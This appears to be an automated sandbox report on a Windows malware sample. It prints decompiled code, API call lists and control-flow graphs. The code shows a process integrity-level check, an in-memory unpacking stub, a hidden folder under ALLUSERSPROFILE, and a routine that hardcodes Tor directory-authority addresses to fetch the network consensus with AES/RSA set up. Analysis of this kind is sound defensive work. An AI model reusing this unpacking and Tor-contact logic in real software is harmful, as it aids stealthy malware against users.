                        					_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
                        					if(_v20 > 8) {
                        						LocalFree(_v16);
                        						_v16 = LocalAlloc(0, _v20);
                        						_t30 = GetTokenInformation(_v8, 0x19, _v16, _v20,  &_v20); // executed
                        					}
                        					if(_t30 != 0 && GetSidSubAuthority( *_v16, 0) != 0) {
                        						E004061D2(_t34,  &_v24, 4);
                        					}
                        					LocalFree(_v16);
                        					CloseHandle(_v8); // executed
                        				}
                        				return _v24;
                        			}








                        0x00405d71
                        0x00405d78
                        0x00405d94
                        0x00405da4
                        0x00405db6
                        0x00405dbf
                        0x00405dc4
                        0x00405dd3
                        0x00405de5
                        0x00405de5
                        0x00405dec
                        0x00405e05
                        0x00405e05
                        0x00405e0d
                        0x00405e15
                        0x00405e15
                        0x00405e21

                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00405D7F
                        • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00405D8D
                        • LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 00405D9F
                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 00405DB6
                        • LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DC4
                        • LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DCE
                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 00405DE5
                        • GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DF5
                        • LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E0D
                        • CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E15
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Local$Token$AllocFreeInformationProcess$AuthorityCloseCurrentHandleOpen
                        • String ID:
                        • API String ID: 1358183241-0
                        • Opcode ID: cc034838ef6585e8e44e3e51d111cb20b3064c3e8dd384f5fd659c2fc58e4f21
                        • Instruction ID: 0ed5edf24493a3d24549599c7cad252047c3f51e1158d8e1505e7d5e37b68127
                        • Opcode Fuzzy Hash: cc034838ef6585e8e44e3e51d111cb20b3064c3e8dd384f5fd659c2fc58e4f21
                        • Instruction Fuzzy Hash: 13111AB1D00119BADF11ABE1CC02FEFB779EF44308F10847AB211B51E1DB758A209BA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 140 86003c-860047 141 86004c-860263 call 860a3f call 860df8 call 860d90 VirtualAlloc 140->141 142 860049 140->142 157 860265-860289 call 860a69 141->157 158 86028b-860292 141->158 142->141 163 8602ce-8603c2 VirtualProtect call 860cce call 860ce7 157->163 160 8602a1-8602b0 158->160 162 8602b2-8602cc 160->162 160->163 162->160 169 8603d1-8603e0 163->169 170 8603e2-860437 call 860ce7 169->170 171 860439-8604b8 VirtualFree 169->171 170->169 173 8605f4-8605fe 171->173 174 8604be-8604cd 171->174 177 860604-86060d 173->177 178 86077f-860789 173->178 176 8604d3-8604dd 174->176 176->173 182 8604e3-860505 LoadLibraryA 176->182 177->178 183 860613-860637 177->183 180 8607a6-8607b0 178->180 181 86078b-8607a3 178->181 184 8607b6-8607cb 180->184 185 86086e-8608be LoadLibraryA 180->185 181->180 186 860517-860520 182->186 187 860507-860515 182->187 188 86063e-860648 183->188 190 8607d2-8607d5 184->190 194 8608c7-8608f9 185->194 191 860526-860547 186->191 187->191 188->178 189 86064e-86065a 188->189 189->178 193 860660-86066a 189->193 195 8607d7-8607e0 190->195 196 860824-860833 190->196 192 86054d-860550 191->192 199 860556-86056b 192->199 200 8605e0-8605ef 192->200 201 86067a-860689 193->201 203 860902-86091d 194->203 204 8608fb-860901 194->204 197 8607e4-860822 195->197 198 8607e2 195->198 202 860839-86083c 196->202 197->190 198->196 205 86056f-86057a 199->205 206 86056d 199->206 200->176 207 860750-86077a 201->207 208 86068f-8606b2 201->208 202->185 209 86083e-860847 202->209 204->203 210 86057c-860599 205->210 211 86059b-8605bb 205->211 206->200 207->188 212 8606b4-8606ed 208->212 213 8606ef-8606fc 208->213 214 86084b-86086c 209->214 215 860849 209->215 223 8605bd-8605db 210->223 211->223 212->213 217 8606fe-860748 213->217 218 86074b 213->218 214->202 215->185 217->218 218->201 223->192
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0086024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                        • Instruction ID: a674808c53c304cfb92e66001fc9b1103b688bc5da09f1356f6c0807d8b00ea4
                        • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                        • Instruction Fuzzy Hash: 13526874A012299FDB64CF58C985BA9BBB1BF09304F1580E9E90DAB351DB30AE84DF15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 224 405ca9-405cb3 225 405cb5-405cc6 DefWindowProcA 224->225 226 405cc8-405cd7 call 405708 WSACleanup 224->226 227 405cdc-405ce0 225->227 230 40688b-40688d ExitProcess 226->230 227->230
                        C-Code - Quality: 21%
                        			E00405CA9(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                        				long _t8;
                        
                        				if(_a8 == 0x4a) {
                        					E00405708(__eflags, "llfujo");
                        					L004069EE();
                        					ExitProcess(0); // executed
                        					return CreateWindowExA();
                        				}
                        				_t8 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                        				return _t8;
                        			}




                        0x00405cb3
                        0x00405ccd
                        0x00405cd2
                        0x0040688d
                        0x00406892
                        0x00406892
                        0x00405cc1
                        0x00405ce0

                        APIs
                        • DefWindowProcA.USER32(?,0000004A,?,?), ref: 00405CC1
                        • WSACleanup.WSOCK32(llfujo), ref: 00405CD2
                        • ExitProcess.KERNEL32(00000000,0000EA60,a2guard.exe,00002710,0040593C,00000000,00002710), ref: 0040688D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: CleanupExitProcProcessWindow
                        • String ID: J$llfujo
                        • API String ID: 4061260214-3406935086
                        • Opcode ID: 2abe4200e4da3db561151cac60e02286d345053df9edb5948291a9ce3e70d2e9
                        • Instruction ID: 8d8e4aaf7dab07b37ca806b23a74fbfaf284af8421403c40db1d9261f70576c4
                        • Opcode Fuzzy Hash: 2abe4200e4da3db561151cac60e02286d345053df9edb5948291a9ce3e70d2e9
                        • Instruction Fuzzy Hash: 40E04872104209FADB013F869D0299F3F54DB41795F118437F506741D2457E9472AB7B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 47%
                        			E004058CB(void* __eflags, CHAR* _a4, void* _a8) {
                        				void* _t23;
                        				void* _t27;
                        
                        				_t27 =  &(_a4[GetEnvironmentVariableA("ALLUSERSPROFILE", _a4, 0x100)]);
                        				asm("stosb");
                        				_t4 = E004065B9(0x5c, 4) + 4; // 0x4
                        				_t23 = _t4;
                        				do {
                        					_t11 = E004065B9(_t11, 0x18) + 0x61;
                        					asm("stosb");
                        					_t23 = _t23 - 1;
                        					_t34 = _t23;
                        				} while (_t23 != 0);
                        				asm("stosb");
                        				 *_t27 = 0;
                        				CreateDirectoryA(_a4, 0); // executed
                        				memcpy(_t27, _a8, E00406492(_t34, _a8));
                        				asm("stosb");
                        				asm("stosb");
                        				asm("stosb");
                        				asm("stosb");
                        				asm("stosb");
                        				return _a4;
                        			}





                        0x004058e6
                        0x004058eb
                        0x004058f3
                        0x004058f3
                        0x004058f6
                        0x004058fd
                        0x00405900
                        0x00405901
                        0x00405901
                        0x00405901
                        0x00405906
                        0x00405907
                        0x0040590f
                        0x00405921
                        0x00405925
                        0x00405928
                        0x0040592b
                        0x0040592e
                        0x00405931
                        0x00405939

                        APIs
                        • GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000100,llfujo,?,00000003,?,00401178,?,llfujo,00000000,?,00000100,a2guard.exe,00002710,0040593C), ref: 004058DE
                        • CreateDirectoryA.KERNEL32(?,00000000,00000018,00000004,ALLUSERSPROFILE,?,00000100,llfujo,?,00000003,?,00401178,?,llfujo,00000000,?), ref: 0040590F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: CreateDirectoryEnvironmentVariable
                        • String ID: ALLUSERSPROFILE$llfujo
                        • API String ID: 2250995361-674987400
                        • Opcode ID: 741397e24d0d02486c049c9e4da187bbc5d51e9295f2321dce677bdad8d0cd34
                        • Instruction ID: 8f067fe18934d6b87310dcfc29caca367401994bebfb759ff0ce01904268353f
                        • Opcode Fuzzy Hash: 741397e24d0d02486c049c9e4da187bbc5d51e9295f2321dce677bdad8d0cd34
                        • Instruction Fuzzy Hash: EDF0F43A100108BACB00EF1ADC02FCA3F129B58399F519035FB142B2C2DF71A516AF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 240 40f550-40f57f 242 40f581-40f587 240->242 243 40f589 242->243 244 40f58f-40f595 242->244 243->244 245 40f597-40f59d 244->245 246 40f5af-40f5b6 244->246 245->246 247 40f59f-40f5a5 245->247 246->242 248 40f5b8 246->248 247->246 249 40f5a7-40f5ad 247->249 250 40f5ee-40f746 GlobalAlloc 248->250 249->246 251 40f5ba-40f5c4 249->251 258 40f768 call 40d980 250->258 259 40f748-40f74d 250->259 251->250 252 40f5c6-40f5e6 251->252 252->250 262 40f76d-40f794 call 40dd60 call 40d9a0 call 40d970 258->262 261 40f750-40f756 259->261 263 40f758 261->263 264 40f75e-40f766 call 40db50 261->264 263->264 264->258 264->261
                        APIs
                        • GlobalAlloc.KERNELBASE(00000000,00847C14), ref: 0040F6C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308116813.000000000040A000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: AllocGlobal
                        • String ID: ![$@R
                        • API String ID: 3761449716-3143744918
                        • Opcode ID: 4ddd8694687c28b8444426dd6c555b5ae585839390be9013c3db5c396f0f1c9b
                        • Instruction ID: 98098615c7e61e3209297b63cb06055a76a04939ce80bd2ecad00045fb544937
                        • Opcode Fuzzy Hash: 4ddd8694687c28b8444426dd6c555b5ae585839390be9013c3db5c396f0f1c9b
                        • Instruction Fuzzy Hash: 7E5103349042909BD310DF64ED48B963BA1FBAA304F00543AE559E73F1D7B9498AC7BE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 303 b126ae-b126c7 304 b126c9-b126cb 303->304 305 b126d2-b126de CreateToolhelp32Snapshot 304->305 306 b126cd 304->306 307 b126e0-b126e6 305->307 308 b126ee-b126fb Module32First 305->308 306->305 307->308 313 b126e8-b126ec 307->313 309 b12704-b1270c 308->309 310 b126fd-b126fe call b1236d 308->310 314 b12703 310->314 313->304 313->308 314->309
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B126D6
                        • Module32First.KERNEL32(00000000,00000224), ref: 00B126F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B11000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b11000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 377ae04f542a6544909720522edbd3540c55ecb034ede902076eedcde2f3dc74
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: E7F062311007146BD7203BB5AC8DAAE76E8EF49724F5005A8E652D14C0DA70EC954A65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 316 860df8-860e0d SetErrorMode * 2 317 860e14-860e15 316->317 318 860e0f 316->318 318->317
                        APIs
                        • SetErrorMode.KERNELBASE(00000400,?,?,00860223,?,?), ref: 00860E02
                        • SetErrorMode.KERNELBASE(00000000,?,?,00860223,?,?), ref: 00860E07
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: d645ef7b6af48f12e870c34ed1b5640e3bd74d96dc479c3fbf86ac33cd21b16b
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 3AD0123114512C77D7402A94DC09BCE7B1CDF05B67F008051FB0DD9181C771994046E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 398 40d980-40d99c VirtualProtect
                        APIs
                        • VirtualProtect.KERNELBASE(0083F730,00847C14,00000040), ref: 0040D995
                        Memory Dump Source
                        • Source File: 00000000.00000002.308116813.000000000040A000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: d4c84bd9978b7fb4b76ac18cd9993b0199ccbdc30b391d2bbd7efd86884b4ca2
                        • Instruction ID: ea5698d955b10bbefbe7e398434c6d4fcd029ac7c9358c260c771c71912e556b
                        • Opcode Fuzzy Hash: d4c84bd9978b7fb4b76ac18cd9993b0199ccbdc30b391d2bbd7efd86884b4ca2
                        • Instruction Fuzzy Hash: 3DC08CF4114100AFD608CB10ED84E2233ACF388300F10492DF282931A0CB30A801CAB8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00860929
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        • Opcode ID: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
                        • Instruction ID: 3e9c807a23c100a99a722049cf7bfbcce58d99a4c5dbb09bf75c012b4819f226
                        • Opcode Fuzzy Hash: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
                        • Instruction Fuzzy Hash: D490047034435111DC703DFC0C01F0500013741730F7107107130FD5D5DC4055004157
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00B123BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B11000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b11000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: 13d891cb4ad03498a9da140ae60868faa3d564dbea93a8e2db4f7af4f4f7ee90
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: A6113C79A00208EFDB01DF98C985E98BBF5EF08350F158094F9489B362D775EA90EF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E004011B8(signed int __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                        				long* _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v24;
                        				int _v28;
                        				int _v32;
                        				int _v36;
                        				int _v40;
                        				signed int _v44;
                        				int _v48;
                        				signed int _v52;
                        				int _v56;
                        				void* _v184;
                        				char _v312;
                        				char _v440;
                        				int _v444;
                        				intOrPtr _v448;
                        				intOrPtr _v452;
                        				short _v454;
                        				char _v455;
                        				char _v456;
                        				char _v460;
                        				char _v464;
                        				char _v468;
                        				char _v472;
                        				char _v476;
                        				char _v480;
                        				char _v484;
                        				char _v488;
                        				char _v492;
                        				char _v496;
                        				char _v500;
                        				char _v504;
                        				char _v508;
                        				char _v512;
                        				char _v516;
                        				char _v520;
                        				char _v524;
                        				intOrPtr _v528;
                        				intOrPtr _v532;
                        				char _v540;
                        				intOrPtr _v544;
                        				intOrPtr _v548;
                        				char _v556;
                        				intOrPtr _v560;
                        				intOrPtr _v564;
                        				char _v572;
                        				signed int _v576;
                        				char _v881;
                        				char _v901;
                        				char _v1000;
                        				char _v1041;
                        				signed int _v1042;
                        				signed int _v1043;
                        				char _v1063;
                        				char _v1064;
                        				char _v1065;
                        				intOrPtr _v1069;
                        				char _v1070;
                        				char _v1086;
                        				char _v1284;
                        				intOrPtr _v1288;
                        				int _v1292;
                        				int _v1296;
                        				char _v1300;
                        				int _v1304;
                        				int _v1308;
                        				char _v1312;
                        				char _v1313;
                        				intOrPtr _v1444;
                        				char _v1445;
                        				char _v1460;
                        				char _v1545;
                        				char _v1565;
                        				char _v1566;
                        				signed int _v1570;
                        				char _v1590;
                        				char _v1600;
                        				intOrPtr _v1616;
                        				char _v1620;
                        				intOrPtr _v1624;
                        				CHAR* _v1628;
                        				intOrPtr _v1632;
                        				CHAR* _v1636;
                        				intOrPtr _v1640;
                        				CHAR* _v1644;
                        				intOrPtr _v1648;
                        				CHAR* _v1652;
                        				intOrPtr _v1656;
                        				CHAR* _v1660;
                        				intOrPtr _v1664;
                        				CHAR* _v1668;
                        				intOrPtr _v1672;
                        				CHAR* _v1676;
                        				intOrPtr _v1680;
                        				CHAR* _v1684;
                        				intOrPtr _v1688;
                        				CHAR* _v1692;
                        				char _v1696;
                        				int _v1700;
                        				int _v1704;
                        				signed int _v1708;
                        				char _v1740;
                        				char* _v1748;
                        				char* _v1752;
                        				intOrPtr _v1760;
                        				intOrPtr _v1764;
                        				char _v1768;
                        				intOrPtr _v1772;
                        				intOrPtr _v1776;
                        				intOrPtr _v1780;
                        				intOrPtr _v1784;
                        				char _v1788;
                        				intOrPtr _v1792;
                        				intOrPtr _v1800;
                        				char _v1808;
                        				signed int _v1816;
                        				char _v1828;
                        				int _v1880;
                        				int _v1884;
                        				char _v1888;
                        				void* _v1892;
                        				int _v1896;
                        				char _v1904;
                        				char _v1916;
                        				char* _v1920;
                        				char _v1924;
                        				BYTE* _v1928;
                        				int _v1932;
                        				signed int _t686;
                        				signed int _t695;
                        				signed int _t700;
                        				signed int _t702;
                        				signed int _t706;
                        				int _t708;
                        				signed int _t714;
                        				signed int _t721;
                        				intOrPtr _t726;
                        				signed int _t732;
                        				char _t733;
                        				signed int _t740;
                        				signed int _t767;
                        				signed int _t772;
                        				signed int _t792;
                        				signed int _t794;
                        				int _t800;
                        				signed int _t801;
                        				signed int _t809;
                        				signed int _t812;
                        				signed int _t816;
                        				signed int _t817;
                        				signed int _t822;
                        				intOrPtr _t830;
                        				void* _t832;
                        				signed int _t836;
                        				signed int _t844;
                        				signed int _t863;
                        				signed int _t865;
                        				intOrPtr _t880;
                        				char _t881;
                        				signed int _t889;
                        				signed int _t901;
                        				signed int _t959;
                        				signed int _t961;
                        				signed int _t963;
                        				signed int _t973;
                        				signed int _t975;
                        				signed int _t976;
                        				signed int _t977;
                        				signed int _t978;
                        				void* _t980;
                        				signed int _t981;
                        				signed int _t983;
                        				signed int _t984;
                        				void* _t986;
                        				signed int _t987;
                        				int _t995;
                        				signed int _t1000;
                        				signed int _t1004;
                        				intOrPtr _t1008;
                        				void* _t1011;
                        				char* _t1017;
                        				char* _t1023;
                        				void* _t1025;
                        				char* _t1027;
                        				char* _t1028;
                        				char* _t1029;
                        				char* _t1030;
                        				char* _t1031;
                        				char _t1032;
                        				char* _t1033;
                        				BYTE* _t1034;
                        				char* _t1035;
                        				char* _t1036;
                        				char* _t1040;
                        				char* _t1041;
                        				char* _t1042;
                        				void* _t1043;
                        				intOrPtr* _t1044;
                        				char _t1047;
                        				void* _t1048;
                        				void* _t1049;
                        
                        				_t1014 = __edx;
                        				E00406259( &_v1932,  &_v16 - _t1049);
                        				CryptAcquireContextA( &_v8, 0, "Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider", 0xd, 0xf0000000);
                        				_push(0);
                        				_push(0);
                        				_push(L"SHA1");
                        				_push( &_v12);
                        				 *((intOrPtr*)(E00406788( &_v16 - _t1049, E00406698("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                        				_push(0);
                        				_push(0);
                        				_push(L"RSA");
                        				_push( &_v16);
                        				 *((intOrPtr*)(E00406788( &_v16 - _t1049, E00406698("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                        				_push(0);
                        				_push(0);
                        				_push(L"AES");
                        				_push( &_v20);
                        				 *((intOrPtr*)(E00406788( &_v16 - _t1049, E00406698("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                        				_push(0);
                        				_push(0x20);
                        				_push(L"ChainingModeECB");
                        				_push(L"ChainingMode");
                        				_push(_v20);
                        				_t657 =  *((intOrPtr*)(E00406788( &_v16 - _t1049, E00406698("bcrypt.dll"), "BCryptSetProperty")))();
                        				_v1896 = 0;
                        				_v1932 = 0;
                        				_v1692 = "193.23.244.244";
                        				_v1688 = 0x50;
                        				_v1684 = "86.59.21.38";
                        				_v1680 = 0x50;
                        				_v1676 = "199.58.81.140";
                        				_v1672 = 0x50;
                        				_v1668 = "204.13.164.118";
                        				_v1664 = 0x50;
                        				_v1660 = "194.109.206.212";
                        				_v1656 = 0x50;
                        				_v1652 = "131.188.40.189";
                        				_v1648 = 0x50;
                        				_v1644 = "154.35.175.225";
                        				_v1640 = 0x50;
                        				_v1636 = "171.25.193.9";
                        				_v1632 = 0x1bb;
                        				_v1628 = "128.31.0.34";
                        				_v1624 = 0x23ab;
                        				_v1620 = "128.31.0.39";
                        				_v1616 = 0x23ab;
                        				_v1696 = 5;
                        				while(1) {
                        					_t31 =  &_v1696;
                        					 *_t31 = _v1696 - 1;
                        					_t1051 =  *_t31;
                        					if( *_t31 < 0) {
                        						break;
                        					}
                        					E004065B9(_t657, 0xa);
                        					_t657 = E00402A45(_t1014, _t1051,  *[ss:ecx+ebp-0x698],  *[ss:ecx+ebp-0x694], "/tor/status-vote/current/consensus",  &_v576);
                        					_t1052 = _t657;
                        					if(_t657 == 0) {
                        						continue;
                        					}
                        					_v40 = _t657;
                        					_t686 = E00406561(_t1052, _v576, _v40, "directory-footer");
                        					_t657 = _t686;
                        					if(_t686 == 0) {
                        						continue;
                        					} else {
                        						_t1014 = _v576;
                        						_t657 = E00406259(_t657 - _v576 + _v576, _v40 - _t657 - _v576);
                        						_v1700 = 0;
                        						_v1704 = 0;
                        						_t1023 = _v576;
                        						do {
                        							if(_v40 > 3 &&  *_t1023 == 0xa &&  *((char*)(_t1023 + 1)) == 0x72 &&  *((char*)(_t1023 + 2)) == 0x20) {
                        								_v1700 = _v1700 + 1;
                        								_t984 = E00403D29(_t1023);
                        								_t657 = _t984 & 0x00000008;
                        								if((_t984 & 0x00000008) != 0) {
                        									_v1704 = _v1704 + 1;
                        								}
                        							}
                        							_t1023 = _t1023 + 1;
                        							_t51 =  &_v40;
                        							 *_t51 = _v40 - 1;
                        						} while ( *_t51 != 0);
                        						if(_v1700 > 0x3e8) {
                        							_v1708 = 0;
                        							while(1) {
                        								__eflags = _v1708 - 4;
                        								if(_v1708 > 4) {
                        									goto L133;
                        								}
                        								_t1024 = E00403CE1(_v576, E004065B9(_t657, _v1700), 0);
                        								_t657 = E00403D29(_t690);
                        								__eflags = _v1708;
                        								if(_v1708 != 0) {
                        									L17:
                        									__eflags = _v1708 - 1;
                        									if(_v1708 != 1) {
                        										L19:
                        										__eflags = _v1708 - 2;
                        										if(_v1708 != 2) {
                        											L21:
                        											__eflags = _v1708 - 4;
                        											if(__eflags != 0) {
                        												L23:
                        												_t695 = E00403C2A(__eflags, _t1024, _t1048 + _v1708 * 4 - 0x6dc, _t1048 + _v1708 * 4 - 0x6f0, _t1048 + _v1708 * 4 - 0x704, _t1048 + _v1708 * 4 - 0x718);
                        												_t657 = _t695;
                        												__eflags = _t695;
                        												if(_t695 != 0) {
                        													continue;
                        												}
                        												__eflags = _v1708 - 1;
                        												if(_v1708 != 1) {
                        													L26:
                        													__eflags = _v1708 - 4;
                        													if(__eflags != 0) {
                        														__eflags = _v1708 - 3;
                        														if(_v1708 != 3) {
                        															__eflags = _v1708 - 2;
                        															if(__eflags != 0) {
                        																__eflags = _v1708;
                        																if(__eflags != 0) {
                        																	L130:
                        																	_v1708 = _v1708 + 1;
                        																	continue;
                        																}
                        																__eflags = E00402D52(_t1014, __eflags, _v1780, _v1800, _a12, _a16,  &_v1896);
                        																if(__eflags == 0) {
                        																	L131:
                        																	_t657 = E00405FFB(_a12, _a16, _v1896);
                        																	_v1708 = 0;
                        																	continue;
                        																}
                        																E00404224(__eflags, _v1896, 0x40826c, 7, 0, _a12);
                        																_v1892 = 0;
                        																_t700 = E00404656(0x186a0,  &_v1920);
                        																__eflags = _t700;
                        																if(_t700 == 0) {
                        																	goto L131;
                        																}
                        																_t702 = E00404656(0x186a0,  &_v1924);
                        																__eflags = _t702;
                        																if(_t702 == 0) {
                        																	goto L131;
                        																}
                        																_t1025 = _v1920;
                        																_v40 = 0;
                        																_v48 = 0;
                        																while(1) {
                        																	E0040621F(_v1896, 0,  &_v1916, 0xa, 0);
                        																	_push( &_v1904);
                        																	_push(0);
                        																	_push(0);
                        																	_t706 =  &_v1916;
                        																	_push(_t706);
                        																	_push(0);
                        																	L00406A24();
                        																	__eflags = _t706;
                        																	if(__eflags <= 0) {
                        																		goto L131;
                        																	}
                        																	_t708 = E00404359(__eflags, _v1896,  &_v1892, _a12);
                        																	__eflags = _t708;
                        																	if(_t708 <= 0) {
                        																		goto L131;
                        																	}
                        																	_v40 = _v40 + _t708;
                        																	_t1043 = _v1892;
                        																	_t995 = _t708;
                        																	memcpy(_t1025, _t1043, _t995);
                        																	_t1049 = _t1049 + 0xc;
                        																	_t1025 = _t1043 + _t995 + _t995;
                        																	E00404681( &_v1892);
                        																	__eflags = _v40 - 0x202;
                        																	if(_v40 < 0x202) {
                        																		continue;
                        																	}
                        																	_t1014 = _v1920;
                        																	_t714 =  *(_t1014 + 0x10) & 0x0000ffff;
                        																	__eflags = _t714 + 0x19 - _v40;
                        																	if(_t714 + 0x19 > _v40) {
                        																		continue;
                        																	}
                        																	_t1000 =  *(_t714 + _t1014 + 0x17) & 0x0000ffff;
                        																	__eflags = _v40 - _t1000 + _t714 + 0x21b;
                        																	if(_v40 != _t1000 + _t714 + 0x21b) {
                        																		continue;
                        																	}
                        																	E00406270(0x40807e, 0xa,  &_v1600);
                        																	asm("bswap eax");
                        																	_t721 =  *((intOrPtr*)(_t1025 - 0x1fd)) + (_v1600 & 0x000000ff) * 0x15180 / 0x100;
                        																	_t1014 = _t721 % 0x15180;
                        																	asm("bswap eax");
                        																	_v1570 = _t721 / 0x15180;
                        																	E00406259(_v1924, 0x186a0);
                        																	_t1047 = _v1924;
